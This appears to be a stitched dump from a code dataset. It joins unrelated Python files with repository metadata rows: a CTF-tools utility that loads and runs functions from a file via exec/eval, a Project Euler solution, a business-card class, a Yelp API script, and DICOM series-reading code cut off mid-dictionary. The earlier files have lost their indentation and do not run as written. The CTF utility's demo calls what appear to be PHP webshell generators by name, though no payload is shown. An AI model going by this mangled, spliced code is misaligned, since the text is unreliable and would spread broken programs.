# __get_variable_name__ = []
# def get_variable_name(x):
# global __get_variable_name__
# if not __get_variable_name__:
# __get_variable_name__ = pattren.findall(traceback.extract_stack(limit=2)[0][3])
# return __get_variable_name__.pop(0)
#鸡贼的获取变量名的字符串#
import os,sys
try:
from .matcher import Matcher
from .init_arg_checker import check_init_arg
except ImportError as ex:
path=os.path.abspath('.')
if 'tools' in path.replace('\\','/').split('/'):#这里是为了便于开发调试
path=path.split('tools',maxsplit=1)[0]+'Library/utils'
else:
path=path+'/Library/utils'
if not path in (p.replace('\\','/') for p in sys.path):
sys.path.append(path)
from matcher import Matcher
from init_arg_checker import check_init_arg
class pyfunc_scanner:
def __init__(self,file_path):
self._file_path=file_path
if not check_init_arg(self):
raise Exception('[!]error:参数检测不通过')
self._readfile()
def _check_file_path(self,_file_path):
if os.path.exists(_file_path) and os.path.isfile(_file_path):
return True
return False
def _readfile(self):
with open(self._file_path,'r',encoding='utf-8') as f:
self._file_data=f.read()
self._file_data_line=self._file_data.split('\n')
def _basic_match_scan(self,pattren,allow_space):
'''获取满足匹配的行号'''
R=[]
M=Matcher(substr=pattren,asterisk_match_len_blacklist=tuple())
for i,l in enumerate(self._file_data_line):
t=l
if allow_space:
t=l.strip()
#匹配
if M.is_match(t):
#加入结果(行号)
R.append(i)
return R
def _get_func_name(self,s):
'''从一行获取函数名'''
s=s.strip()
s=s.split(' ')
s=[i.strip() for i in s]
while '' in s:
s.remove('')
if 'def' in s:
s.remove('def')
s=''.join(s)
s=s.split('(')[0]
return s
def _get_func_args(self,s):
'''从一行获取函数参数'''
args=[i.strip() for i in s.split('(')[1].split(')')[0].strip().split(',')]
while '' in args:
args.remove('')
return tuple(a.split('=')[0] for a in args)
def _get_func_info(self,s0,s1,s2):
'''从当前一行和下一行获取注释'''
info=''
if '#' in s0:
info+=s0.split('#',maxsplit=1)[1]
if '#' in s1:
info+=s1.split('#',maxsplit=1)[1]
if '#' in s2:
info+=s2.split('#',maxsplit=1)[1]
if s2.count("'''")==2:
info+=s2.strip().replace("'''",'').strip()
if s2.strip().startswith('print(') and s2.strip().endswith(')'):
t=s2.strip()[6:-1]
if (t[0]=='"' or t[0]=="'") and (t[-1]=='"' or t[-1]=="'"):
t=t[1:-1]
info+=t
return info
def _ana_func(self,flist):
R=[]
for i in flist:
if i<=0:t0=''
else:t0=self._file_data_line[i-1]
t1=self._file_data_line[i]
if i+1>=len(self._file_data_line):t2=''
else:t2=self._file_data_line[i+1]
R.append((self._get_func_name(t1),self._get_func_args(t1),self._get_func_info(t0,t1,t2)))
return R
def scan_func(self,pattren,allow_space):
R=self._basic_match_scan(pattren,allow_space)
R=self._ana_func(R)
return R
class pyfunc_loader:
def __init__(self,file_path,func_list):
self._file_path=file_path
self._func_list=func_list
if not check_init_arg(self):
raise Exception('[!]error:参数检测不通过')
def _check_file_path(self,_file_path):
if os.path.exists(_file_path) and os.path.isfile(_file_path):
self._file_name=os.path.split(self._file_path)[1]
self._file_path=os.path.split(self._file_path)[0]
return True
return False
def _check_func_list(self,_func_list):
if not isinstance(_func_list,list):return False
for i in _func_list:
if not isinstance(i,tuple):return False
if len(i)!=3:return False
return True
def load(self):
if not self._file_path in sys.path:
sys.path.append(self._file_path)
R=[]
for f in self._func_list:
exec('from '+self._file_name[:-3]+' import '+f[0])
func=eval(f[0])
R.append((f[0],f[1],f[2],func))
return R
class pyfunc_runner:
def __init__(self,func_list):
self._func_list=func_list
self._func_index={}#索引,避免每次都遍历list
if not check_init_arg(self):
raise Exception('[!]error:参数检测不通过')
self._build_func_index()
def _check_func_list(self,_func_list):
if not isinstance(_func_list,list):return False
for i in _func_list:
if not isinstance(i,tuple):return False
if len(i)!=4:return False
return True
def _build_func_index(self):
for index,func in enumerate(self._func_list):
self._func_index[func[0]]=index
def _find_func(self,funcname):
if funcname not in self._func_index:
raise Exception('无此函数')
return self._func_list[self._func_index[funcname]]
def _get_run_arg(self,funcname,kargs):
func=self._find_func(funcname)
args={}
for a in func[1]:
if a in kargs.keys():
args[a]=kargs[a]
if len(args)!=len(func[1]):
return (False,args)
else:return (True,args)
def _completion_input(self,funcname,args):
func=self._find_func(funcname)
r=args.copy()
for k in func[1]:
if k not in args.keys():
#需要输入
c=input('输入缺少的参数->'+k+':')
if c.isdigit():
r[k]=int(c)
else:
r[k]=c
return r
def run(self,funcname,completion_input=True,**kargs):
r=self._get_run_arg(funcname,kargs)
if r[0]==True:
r=r[1]
elif completion_input:
r=self._completion_input(funcname,r[1])
else:
raise Exception('参数不匹配'+tuple(r[1])+'!='+kargs.keys())
#运行
func=self._find_func(funcname)
return eval("func[3](**r)")
class pyfunc_util:
def __init__(self,file_path,pattren,tolerant=False):
'''tolerant标记是否允许前后的空格'''
self._S=pyfunc_scanner(file_path)
self._Funcs3=self._S.scan_func(pattren,tolerant)
self._L=pyfunc_loader(file_path,self._Funcs3)
self._Funcs4=self._L.load()
self._R=pyfunc_runner(self._Funcs4)
def run(self,funcname,completion_input=True,**kargs):
return self._R.run(funcname,completion_input,**kargs)
def get_func(self,funcname):
try:
return self._R._find_func(funcname)
except Exception as ex:
pass
def get_funclist(self):
return self._Funcs3
if __name__ == "__main__":
#S=pyfunc_scanner('D:\\ctf-tool\\Library\\createaword\\jspcreater.py')
#S.scan_func('def jsp_*(*)*:',False)
p='G:\\python\\tool_manager\\Library\\createaword\\phpcreater.py'
# S=pyfunc_scanner(p)
# s=S.scan_func('def php_*(*)*:',False)
# L=pyfunc_loader(p,s)
# F=L.load()
# #for f in F:
# # print(f)
# R=pyfunc_runner(p,F)
# print(R.run('php_guogou',pwd='c'))
p=pyfunc_util(p,'def php_*(*)*:')
print(p.run('php_muti_base64',pwd='cccccccc',num=4))
| ezeeo/ctf-tools | Library/utils/get_func_from_pyfile.py | get_func_from_pyfile.py | py | 8,168 | python | en | code | 8 | github-code | 13 |
27949826519 | denom = 0
length = 0
for i in range(1,1000):
remainder = []
value = 1
position = 0
while value not in remainder:
position += 1
remainder.append(value)
value %= i
value *= 10
if position > length:
length = position
denom = i
print(denom)
| ha36ad/Math | Project_Euler/reciprocal_cycles.py | reciprocal_cycles.py | py | 346 | python | en | code | 0 | github-code | 13 |
12089155933 | # 名片模型模块
class CardModel:
def __init__(self, name='', com_name='', phone=0, job='', id=0):
self.id = id # ID
self.name = name # 姓名
self.com_name = com_name # 公司名
self.phone = phone # 电话
self.job = job # 职位
@property
def phone(self): # 电话读取方法
return self.__phone
@phone.setter
def phone(self, value): # 电话写入方法
if len(str(value)) in (7, 8, 11):
self.__phone = value
else:
raise Exception('电话错误')
| 15149295552/Code | Month01/Day17/TestWork/code10/cardModel.py | cardModel.py | py | 576 | python | zh | code | 1 | github-code | 13 |
42332761559 | import yelp_api_galleries
import yelp_api_wineries
def yelp_api_calls(latitude, longitude):
api_call_galleries = yelp_api_galleries.main(latitude, longitude)
api_call_wineries = yelp_api_wineries.main(latitude, longitude)
all_wineries = api_call_wineries[0].get("businesses")
my_business_dictionary = {}
for gallery in api_call_galleries:
all_business = gallery.get("businesses")
for business in all_business:
name = business.get("name")
_loc = business.get("location")
address = _loc.get("address")
city = _loc.get("city")
state = _loc.get("state_code")
zip_code = _loc.get("postal_code")
neighborhoods = _loc.get("neighborhoods")
cross_streets = _loc.get("cross_streets")
phone = business.get("display_phone")
url = business.get("url")
if (_loc.get("coordinate")) == None:
continue
else:
latitude = (_loc.get("coordinate").get("latitude"))
longitude = (_loc.get("coordinate").get("longitude"))
categories = business.get("categories")
my_business_dictionary[name] = {
"address" : address,
"city": city,
"state": state,
"zip_code": zip_code,
"neighborhoods": neighborhoods,
"cross_streets": cross_streets,
"phone": phone,
"url": url,
"latitude": latitude,
"longitude": longitude,
"categories": categories,
}
for winery in all_wineries:
name = winery.get("name")
_loc = winery.get("location")
address = _loc.get("address")
city = _loc.get("city")
state = _loc.get("state_code")
zip_code = _loc.get("postal_code")
neighborhoods = _loc.get("neighborhoods")
cross_streets = _loc.get("cross_streets")
phone = winery.get("display_phone")
url = winery.get("url")
latitude = _loc.get("coordinate").get("latitude")
longitude = _loc.get("coordinate").get("longitude")
categories = winery.get("categories")
my_business_dictionary[name] = {
"address" : address,
"city": city,
"state": state,
"zip_code": zip_code,
"neighborhoods": neighborhoods,
"cross_streets": cross_streets,
"phone": phone,
"url": url,
"latitude": latitude,
"longitude": longitude,
"categories": categories
}
return my_business_dictionary
"""
NOTES:
keys with in each business dictionary
[u'is_claimed', u'distance', u'mobile_url', u'rating_img_url', u'review_count', u'name', u'rating', u'url', u'categories', u'is_closed', u'phone', u'snippet_text', u'image_url', u'location', u'display_phone', u'rating_img_url_large', u'id', u'snippet_image_url', u'rating_img_url_small'] """
#business = data_list[0].get("businesses")[0].get("location")
#name_business = data_list[0].get("businesses")[0].get("name")
"""location dictionary
{u'cross_streets': u'Jefferson St & Clay St', u'city': u'Oakland', u'display_address': [u'560 2nd St', u'Jack London Square', u'Oakland, CA 94607'], u'geo_accuracy': 9.5, u'neighborhoods': [u'Jack London Square'], u'postal_code': u'94607', u'country_code': u'US', u'address': [u'560 2nd St'], u'coordinate': {u'latitude': 37.7971005, u'longitude': -122.278887}, u'state_code': u'CA'}
latitude = data_list[0].get("businesses")[0].get("location").get("coordinate").get("latitude")
""" | jabrad0/Getgo | combine_galleries_wineries.py | combine_galleries_wineries.py | py | 3,690 | python | en | code | 17 | github-code | 13 |
def find_dicom_series(paths, search_directories = True, search_subdirectories = True,
                      log = None, verbose = False):
    '''
    Locate DICOM files under the given paths and group them into Series.

    paths: iterable of file and/or directory paths.
    search_directories: look inside directory paths for .dcm files.
    search_subdirectories: recurse into subdirectories of those directories.
    log: optional logger providing status()/info()/warning(); may be None.
    verbose: if true, log the full DICOM headers of each series.

    Returns a list of Series sorted by patient id, study date, name and path.
    '''
    dfiles = files_by_directory(paths, search_directories = search_directories,
                                search_subdirectories = search_subdirectories)
    nseries = len(dfiles)
    nfiles = sum(len(dpaths) for dpaths in dfiles.values())
    nsfiles = 0
    series = []
    for dpaths in dfiles.values():
        nsfiles += len(dpaths)
        if log:
            # Bug fix: log defaults to None, but log.status() was previously
            # called unconditionally, raising AttributeError without a logger.
            log.status('Reading DICOM series %d of %d files in %d series' % (nsfiles, nfiles, nseries))
        series.extend(dicom_file_series(dpaths, log = log, verbose = verbose))

    # Include patient id in model name only if multiple patients found
    pids = set(s.attributes['PatientID'] for s in series if 'PatientID' in s.attributes)
    use_patient_id_in_name = unique_prefix_length(pids) if len(pids) > 1 else 0
    for s in series:
        s.use_patient_id_in_name = use_patient_id_in_name

    series.sort(key = lambda s: s.sort_key)
    find_reference_series(series)
    return series
# -----------------------------------------------------------------------------
# Group dicom files into series.
#
def dicom_file_series(paths, log = None, verbose = False):
    '''
    Partition DICOM files into Series objects keyed by SeriesInstanceUID.
    Files lacking a SeriesInstanceUID are ignored.  Each resulting series
    has its slices ordered.  Returns a tuple of Series.
    '''
    from pydicom import dcmread
    by_uid = {}
    for fpath in paths:
        data = dcmread(fpath)
        if not hasattr(data, 'SeriesInstanceUID'):
            continue
        uid = data.SeriesInstanceUID
        if uid not in by_uid:
            by_uid[uid] = Series(log = log)
        by_uid[uid].add(fpath, data)

    all_series = tuple(by_uid.values())
    for ser in all_series:
        ser.order_slices()

    if verbose and log:
        # Re-read the first file of each series to report its full header.
        for ser in all_series:
            first = ser.paths[0]
            data = dcmread(first)
            log.info('Data set: %s\n%s\n%s\n' % (first, data.file_meta, data))
    return all_series
# -----------------------------------------------------------------------------
# Set of dicom files (.dcm suffix) that have the same series unique identifer (UID).
#
class Series:
    '''
    Set of DICOM files (.dcm suffix) sharing one SeriesInstanceUID: a stack
    of single-frame image files, one multi-frame file, or a time series.
    '''

    #
    # Code assumes each file for the same SeriesInstanceUID will have the same
    # value for these parameters.  So they are only read for the first file.
    # Not sure if this is a valid assumption.
    #
    dicom_attributes = ['BitsAllocated', 'BodyPartExamined', 'Columns', 'Modality',
                        'NumberOfTemporalPositions',
                        'PatientID', 'PhotometricInterpretation',
                        'PixelPaddingValue', 'PixelRepresentation', 'PixelSpacing',
                        'RescaleIntercept', 'RescaleSlope', 'Rows',
                        'SamplesPerPixel', 'SeriesDescription', 'SeriesInstanceUID', 'SeriesNumber',
                        'SOPClassUID', 'StudyDate']

    def __init__(self, log = None):
        self.paths = []                  # File paths, in time/z order after order_slices()
        self.attributes = {}             # dicom_attributes values from the first file added
        self.transfer_syntax = None      # Image encoding (file_meta TransferSyntaxUID)
        self._file_info = []             # One SeriesFile per path, used for ordering/spacing
        self._multiframe = None          # Cached flag: some file holds multiple frames
        self._reverse_frames = False     # True if multiframe z decreases with frame number
        self._num_times = None           # Corrected time count when the header value is wrong
        self._z_spacing = None           # Cached distance between adjacent image planes
        self.use_patient_id_in_name = 0  # Prefix length of PatientID shown in name (0 = none)
        self._log = log

    def add(self, path, data):
        '''Record one file of this series; data is the parsed dataset for path.'''
        # Read attributes that should be the same for all planes.
        if len(self.paths) == 0:
            attrs = self.attributes
            for attr in self.dicom_attributes:
                if hasattr(data, attr):
                    attrs[attr] = getattr(data, attr)
        self.paths.append(path)
        # Read attributes used for ordering the images.
        self._file_info.append(SeriesFile(path, data))
        # Get image encoding format
        if self.transfer_syntax is None and hasattr(data.file_meta, 'TransferSyntaxUID'):
            self.transfer_syntax = data.file_meta.TransferSyntaxUID

    @property
    def name(self):
        '''Readable series name from description (or body part and modality)
        plus series number; "unknown" if none of those are available.'''
        attrs = self.attributes
        fields = []
        desc = attrs.get('SeriesDescription')
        if desc:
            fields.append(desc)
        else:
            if 'BodyPartExamined' in attrs:
                fields.append(attrs['BodyPartExamined'])
            if 'Modality' in attrs:
                fields.append(attrs['Modality'])
        if 'SeriesNumber' in attrs:
            fields.append(str(attrs['SeriesNumber']))
        if len(fields) == 0:
            fields.append('unknown')
        name = ' '.join(fields)
        return name

    @property
    def sort_key(self):
        # Order series by patient, study date, name, then first file path.
        attrs = self.attributes
        return (attrs.get('PatientID',''), attrs.get('StudyDate',''), self.name, self.paths[0])

    @property
    def plane_uids(self):
        # SOPInstanceUID of every image file, in current file order.
        return tuple(fi._instance_uid for fi in self._file_info)

    @property
    def ref_plane_uids(self):
        # For a single multiframe file, the SOPInstanceUIDs of the source
        # images it was derived from, or None if not recorded.
        fis = self._file_info
        if len(fis) == 1 and hasattr(fis[0], '_ref_instance_uids'):
            uids = fis[0]._ref_instance_uids
            if uids is not None:
                return tuple(uids)
        return None

    @property
    def num_times(self):
        # Number of time points: header NumberOfTemporalPositions unless
        # corrected by _validate_time_series().
        if self._num_times is None:
            nt = int(self.attributes.get('NumberOfTemporalPositions', 1))
        else:
            nt = self._num_times
        return nt

    @property
    def multiframe(self):
        # True if any file of the series contains more than one frame (cached).
        mf = self._multiframe
        if mf is None:
            mf = False
            for fi in self._file_info:
                if fi.multiframe:
                    self._multiframe = mf = True
                    break
            self._multiframe = mf
        return mf

    def order_slices(self):
        '''Sort file paths by time, then z position along the plane normal.'''
        paths = self.paths
        if len(paths) == 1 and self.multiframe:
            # Determination of whether frames reversed done in z_plane_spacing()
            self.z_plane_spacing()
        if len(paths) <= 1:
            return

        # Check that time series images all have time value, and all times are found
        self._validate_time_series()

        files = self._file_info
        self._sort_by_z_position(files)
        self.paths = tuple(fi.path for fi in files)

    def _validate_time_series(self):
        '''Verify each image has a time and every time has the same plane count.
        Corrects num_times (with a warning) if the header count is wrong;
        raises ValueError on missing times or uneven plane counts.'''
        if self.num_times == 1:
            return

        files = self._file_info
        for fi in files:
            if fi._time is None:
                raise ValueError('Missing dicom TemporalPositionIdentifier for image %s' % fi.path)

        tset = set(fi._time for fi in files)
        if len(tset) != self.num_times:
            if self._log:
                msg = ('DICOM series header says it has %d times but %d found, %s... %d files.'
                       % (self.num_times, len(tset), files[0].path, len(files)))
                self._log.warning(msg)
            self._num_times = len(tset)

        tcount = {t:0 for t in tset}
        for fi in files:
            tcount[fi._time] += 1
        nz = len(files) / self.num_times
        for t,c in tcount.items():
            if c != nz:
                raise ValueError('DICOM time series time %d has %d images, expected %d'
                                 % (t, c, nz))

    def grid_size(self):
        '''Return the (x, y, z) voxel grid size for one time point.'''
        attrs = self.attributes
        xsize, ysize = attrs['Columns'], attrs['Rows']
        files = self._file_info
        if self.multiframe:
            if len(files) == 1:
                zsize = self._file_info[0]._num_frames
            else:
                maxf = max(fi._num_frames for fi in files)
                # Bug fix: this message previously used the undefined name
                # 'npaths', raising NameError instead of the intended ValueError.
                raise ValueError('DICOM multiple paths (%d), with multiple frames (%d) not supported, %s'
                                 % (len(files), maxf, files[0].path))
        else:
            zsize = len(files) // self.num_times

        return (xsize, ysize, zsize)

    def origin(self):
        '''Patient-space position of the first voxel, or None if unknown.'''
        files = self._file_info
        if len(files) == 0:
            return None

        pos = files[0]._position
        if pos is None:
            return None

        if self.multiframe and self._reverse_frames:
            # Frames are stored in decreasing z order; shift the origin
            # to the far end of the frame stack.
            zoffset = files[0]._num_frames * -self.z_plane_spacing()
            zaxis = self.plane_normal()
            pos = tuple(a+zoffset*b for a,b in zip(pos, zaxis))

        return pos

    def rotation(self):
        '''Rotation matrix whose columns are the patient-space image axes.'''
        (x0,y0,z0),(x1,y1,z1),(x2,y2,z2) = self._patient_axes()
        return ((x0,x1,x2),(y0,y1,y2),(z0,z1,z2))

    def _patient_axes(self):
        # Image row, column and normal directions in patient coordinates;
        # identity axes if no orientation is recorded.
        files = self._file_info
        if files:
            # TODO: Different files can have different orientations.
            #       For example, study 02ef8f31ea86a45cfce6eb297c274598/series-000004.
            #       These should probably be separated into different series.
            orient = files[0]._orientation
            if orient is not None:
                x_axis, y_axis = orient[0:3], orient[3:6]
                from chimerax.geometry import cross_product
                z_axis = cross_product(x_axis, y_axis)
                return (x_axis, y_axis, z_axis)
        return ((1,0,0),(0,1,0),(0,0,1))

    def plane_normal(self):
        '''Unit vector perpendicular to the image planes.'''
        return self._patient_axes()[2]

    def _sort_by_z_position(self, series_files):
        # Sort in place by time, then distance along the plane normal.
        z_axis = self.plane_normal()
        from chimerax.geometry import inner_product
        series_files.sort(key = lambda sf: (sf._time, inner_product(sf._position, z_axis)))

    def pixel_spacing(self):
        '''Return voxel size (x, y, z); missing values default to 1 with a warning.'''
        pspacing = self.attributes.get('PixelSpacing')
        if pspacing is None and self.multiframe:
            # Multiframe files record spacing per-file rather than in the header.
            pspacing = self._file_info[0]._pixel_spacing

        if pspacing is None:
            xs = ys = 1
            if self._log:
                self._log.warning('Missing PixelSpacing, using value 1, %s' % self.paths[0])
        else:
            xs, ys = [float(s) for s in pspacing]

        zs = self.z_plane_spacing()
        if zs is None:
            nz = self.grid_size()[2]
            if nz > 1 and self._log:
                self._log.warning('Cannot determine z spacing, missing ImagePositionPatient, using value 1, %s'
                                  % self.paths[0])
            zs = 1 # Single plane image
        elif zs == 0:
            if self._log:
                self._log.warning('Error. Image planes are at same z-position. Setting spacing to 1.')
            zs = 1

        return (xs,ys,zs)

    def z_plane_spacing(self):
        '''Distance between adjacent image planes along the plane normal,
        or None if it cannot be determined.  Result is cached.  For
        multiframe files with decreasing z this also sets _reverse_frames.'''
        dz = self._z_spacing
        if dz is None:
            files = self._file_info
            if self.multiframe:
                f = files[0]
                fpos = f._frame_positions
                if fpos is None:
                    gfov = f._grid_frame_offset_vector
                    if gfov is None:
                        dz = None
                    else:
                        dz = self._spacing(gfov)
                else:
                    # TODO: Need to reverse order if z decrease as frame number increases
                    z_axis = self.plane_normal()
                    from chimerax.geometry import inner_product
                    z = [inner_product(fp, z_axis) for fp in fpos]
                    dz = self._spacing(z)
                if dz is not None and dz < 0:
                    self._reverse_frames = True
                    dz = abs(dz)
            elif len(files) < 2:
                dz = None
            else:
                nz = self.grid_size()[2]  # For time series just look at first time point.
                z_axis = self.plane_normal()
                from chimerax.geometry import inner_product
                z = [inner_product(f._position, z_axis) for f in files[:nz]]
                dz = self._spacing(z)
            self._z_spacing = dz

        return dz

    def _spacing(self, z):
        # Spacing between successive values of z.  Warns when spacings are
        # unequal and returns the one with the largest magnitude.
        spacings = [(z1-z0) for z0,z1 in zip(z[:-1],z[1:])]
        dzmin, dzmax = min(spacings), max(spacings)
        tolerance = 1e-3 * max(abs(dzmax), abs(dzmin))
        if dzmax-dzmin > tolerance:
            if self._log:
                from os.path import basename, dirname
                msg = ('Plane z spacings are unequal, min = %.6g, max = %.6g, using max.\n' % (dzmin, dzmax) +
                       'Perpendicular axis (%.3f, %.3f, %.3f)\n' % tuple(self.plane_normal()) +
                       'Directory %s\n' % dirname(self._file_info[0].path) +
                       '\n'.join(['%s %s' % (basename(f.path), f._position) for f in self._file_info]))
                self._log.warning(msg)
        dz = dzmax if abs(dzmax) > abs(dzmin) else dzmin
        return dz

    @property
    def has_image_data(self):
        # True if the pixel format attributes needed to decode images are present.
        attrs = self.attributes
        for attr in ('BitsAllocated', 'PixelRepresentation'):
            if attrs.get(attr) is None:
                return False
        return True

    @property
    def dicom_class(self):
        # Name of the SOP class UID, or 'unknown' when absent.
        cuid = self.attributes.get('SOPClassUID')
        return 'unknown' if cuid is None else cuid.name
# -----------------------------------------------------------------------------
#
class SeriesFile:
    '''Per-file DICOM attributes needed to place and order the image
    planes of one file within a series.'''

    def __init__(self, path, data):
        self.path = path

        # Plane placement in patient coordinates.
        pos = getattr(data, 'ImagePositionPatient', None)
        self._position = tuple(map(float, pos)) if pos else None
        orient = getattr(data, 'ImageOrientationPatient', None)  # horz and vertical image axes
        self._orientation = tuple(map(float, orient)) if orient else None

        # Ordering attributes.
        num = getattr(data, 'InstanceNumber', None)
        self._num = int(num) if num else None
        t = getattr(data, 'TemporalPositionIdentifier', None)
        self._time = int(t) if t else None

        # Multiframe attributes.
        nframes = getattr(data, 'NumberOfFrames', None)
        self._num_frames = None if nframes is None else int(nframes)
        offsets = getattr(data, 'GridFrameOffsetVector', None)
        self._grid_frame_offset_vector = None if offsets is None else [float(v) for v in offsets]

        # Identity.
        self._class_uid = getattr(data, 'SOPClassUID', None)
        self._instance_uid = getattr(data, 'SOPInstanceUID', None)
        self._ref_instance_uid = getattr(data, 'ReferencedSOPInstanceUID', None)

        self._pixel_spacing = None
        self._frame_positions = None
        if nframes is not None:
            # Multiframe files record spacing, frame positions and source
            # image references inside nested functional group sequences.
            def floats(s):
                return [float(x) for x in s]
            self._pixel_spacing = self._sequence_elements(
                data,
                (('SharedFunctionalGroupsSequence', 1),
                 ('PixelMeasuresSequence', 1)),
                'PixelSpacing', floats)
            self._frame_positions = self._sequence_elements(
                data,
                (('PerFrameFunctionalGroupsSequence', 'all'),
                 ('PlanePositionSequence', 1)),
                'ImagePositionPatient', floats)
            self._ref_instance_uids = self._sequence_elements(
                data,
                (('SharedFunctionalGroupsSequence', 1),
                 ('DerivationImageSequence', 1),
                 ('SourceImageSequence', 'all')),
                'ReferencedSOPInstanceUID')

    def __lt__(self, im):
        if self._time != im._time:
            return self._time < im._time
        # Same time point: use z position instead of image number to
        # assure right-handed coordinates.
        return self._position[2] < im._position[2]

    @property
    def multiframe(self):
        # A file holding more than one frame is a whole z stack by itself.
        return self._num_frames is not None and self._num_frames > 1

    def _sequence_elements(self, data, seq_names, element_name, convert = None):
        '''Follow nested sequence elements named by *seq_names* (each a
        (name, count) pair, count 1 or 'all') and return the value of
        *element_name* at the innermost level, converted by *convert* if
        given.  Returns None where a sequence is absent.'''
        if not seq_names:
            value = getattr(data, element_name, None)
            if value is not None and convert is not None:
                value = convert(value)
            return value
        name, count = seq_names[0]
        seq = getattr(data, name, None)
        if seq is None:
            return None
        rest = seq_names[1:]
        if count == 'all':
            return [self._sequence_elements(e, rest, element_name, convert) for e in seq]
        return self._sequence_elements(seq[0], rest, element_name, convert)
# -----------------------------------------------------------------------------
# Find all dicom files (suffix .dcm) in directories and subdirectories and
# group them by directory.
#
def files_by_directory(paths, search_directories = True, search_subdirectories = True,
                       suffix = '.dcm', _dfiles = None):
    '''
    Group files with the given suffix by their containing directory.

    paths may mix file and directory paths.  Directories are descended when
    search_directories is true; nested directories are descended when
    search_subdirectories is true.  Returns {directory: set of file paths}.
    _dfiles is the accumulator used internally by the recursion.
    '''
    from os import listdir
    from os.path import isfile, isdir, dirname, join
    grouped = _dfiles if _dfiles is not None else {}
    for path in paths:
        if isfile(path) and path.endswith(suffix):
            grouped.setdefault(dirname(path), set()).add(path)
        elif search_directories and isdir(path):
            children = [join(path, name) for name in listdir(path)]
            # Whether children directories are descended is governed by
            # search_subdirectories from here on down.
            files_by_directory(children,
                               search_directories = search_subdirectories,
                               search_subdirectories = search_subdirectories,
                               _dfiles = grouped)
    return grouped
# -----------------------------------------------------------------------------
#
class DicomData:
    '''
    Pixel data access for one DICOM series.  Exposes the volume geometry
    (data_size, data_step, data_origin, data_rotation) and reads 2D planes or
    3D submatrices from the series files, applying the DICOM rescale
    slope/intercept to produce output values.
    '''
    def __init__(self, series):
        # series provides paths, parsed attributes and geometry accessors.
        self.dicom_series = series
        self.paths = tuple(series.paths)
        npaths = len(series.paths)  # NOTE(review): unused local
        self.name = series.name
        attrs = series.attributes
        # Stored pixel values map to output values as value*slope + intercept.
        # Keep the intercept integral when possible so integer dtypes stay usable.
        rsi = float(attrs.get('RescaleIntercept', 0))
        if rsi == int(rsi):
            rsi = int(rsi)
        self.rescale_intercept = rsi
        self.rescale_slope = float(attrs.get('RescaleSlope', 1))
        bits = attrs.get('BitsAllocated')
        rep = attrs.get('PixelRepresentation')  # 0 = unsigned, 1 = signed
        self.value_type = numpy_value_type(bits, rep, self.rescale_slope, self.rescale_intercept)
        ns = attrs.get('SamplesPerPixel')
        if ns == 1:
            mode = 'grayscale'
        elif ns == 3:
            mode = 'RGB'
        else:
            raise ValueError('Only 1 or 3 samples per pixel supported, got %d' % ns)
        self.mode = mode
        self.channel = 0
        pi = attrs['PhotometricInterpretation']
        if pi == 'MONOCHROME1':
            pass # Bright to dark values.
        if pi == 'MONOCHROME2':
            pass # Dark to bright values.
        # Pad value marks pixels outside the scanned region, in output units.
        ppv = attrs.get('PixelPaddingValue')
        if ppv is not None:
            self.pad_value = self.rescale_slope * ppv + self.rescale_intercept
        else:
            self.pad_value = None
        # Multiframe series keep the whole volume in a single file.
        self.files_are_3d = series.multiframe
        self._reverse_planes = (series.multiframe and series._reverse_frames)
        self.data_size = series.grid_size()
        self.data_step = series.pixel_spacing()
        self.data_origin = origin = series.origin()
        if origin is None:
            self.origin_specified = False
            self.data_origin = (0,0,0)
        else:
            self.origin_specified = True
        self.data_rotation = series.rotation()
    # ---------------------------------------------------------------------------
    # Reads a submatrix and returns 3D NumPy matrix with zyx index order.
    #
    def read_matrix(self, ijk_origin, ijk_size, ijk_step, time, channel, array, progress):
        '''
        Fill the caller-supplied array (zyx index order) with the subregion
        starting at ijk_origin of size ijk_size, subsampled by ijk_step, for
        the given time point and channel.  The rescale slope/intercept are
        applied in place and the same array is returned.
        '''
        i0, j0, k0 = ijk_origin
        isz, jsz, ksz = ijk_size
        istep, jstep, kstep = ijk_step
        dsize = self.data_size  # NOTE(review): unused local
        if self.files_are_3d:
            # Whole volume lives in one file; slice the full 3D array.
            a = self.read_frames(time, channel)
            array[:] = a[k0:k0+ksz:kstep,j0:j0+jsz:jstep,i0:i0+isz:istep]
        else:
            # One file per plane: read each required plane unrescaled, then
            # rescale the assembled array once below.
            for k in range(k0, k0+ksz, kstep):
                if progress:
                    progress.plane((k-k0)//kstep)
                p = self.read_plane(k, time, channel, rescale = False)
                array[(k-k0)//kstep,:,:] = p[j0:j0+jsz:jstep,i0:i0+isz:istep]
        if self.rescale_slope != 1:
            array *= self.rescale_slope
        if self.rescale_intercept != 0:
            array += self.rescale_intercept
        return array
    # ---------------------------------------------------------------------------
    #
    def read_plane(self, k, time = None, channel = None, rescale = True):
        '''
        Return 2D plane k of the volume, optionally for a given time point
        and channel, converted to self.value_type and rescaled by default.
        '''
        if self._reverse_planes:
            # Frames are stored in reverse z order; flip the index.
            klast = self.data_size[2]-1
            k = klast-k
        from pydicom import dcmread
        if self.files_are_3d:
            # Single multiframe file: plane k is frame k.
            d = dcmread(self.paths[0])
            data = d.pixel_array[k]
        else:
            # One file per plane; time series store data_size[2] planes
            # per time point as consecutive files.
            p = k if time is None else (k + self.data_size[2]*time)
            d = dcmread(self.paths[p])
            data = d.pixel_array
        if channel is not None:
            data = data[:,:,channel]
        a = data.astype(self.value_type) if data.dtype != self.value_type else data
        if rescale:
            if self.rescale_slope != 1:
                a *= self.rescale_slope
            if self.rescale_intercept != 0:
                a += self.rescale_intercept
        return a
    # ---------------------------------------------------------------------------
    #
    def read_frames(self, time = None, channel = None):
        '''
        Return the full 3D pixel array of a multiframe file (no rescaling).
        NOTE(review): the time argument is currently ignored and only
        paths[0] is read -- confirm multiframe time series are not expected here.
        '''
        import pydicom
        d = pydicom.dcmread(self.paths[0])
        data = d.pixel_array
        if channel is not None:
            data = data[:,:,:,channel]
        return data
# -----------------------------------------------------------------------------
# PixelRepresentation 0 = unsigned, 1 = signed
#
def numpy_value_type(bits_allocated, pixel_representation, rescale_slope, rescale_intercept):
    '''
    Choose the NumPy dtype for DICOM pixel data.

    Falls back to float32 whenever integer storage cannot represent the
    rescaled values: a non-unit slope, a fractional intercept, or a negative
    intercept applied to unsigned data.  Otherwise picks the signed/unsigned
    integer type matching BitsAllocated and PixelRepresentation
    (0 = unsigned, 1 = signed).  Raises ValueError for unsupported layouts.
    '''
    from numpy import int8, uint8, int16, uint16, float32
    intercept_is_integral = int(rescale_intercept) == rescale_intercept
    unsigned_negative_offset = (rescale_intercept < 0 and pixel_representation == 0)
    if rescale_slope != 1 or not intercept_is_integral or unsigned_negative_offset:
        return float32
    dtype_table = {(1, 0): uint8,
                   (1, 1): int8,
                   (8, 0): uint8,
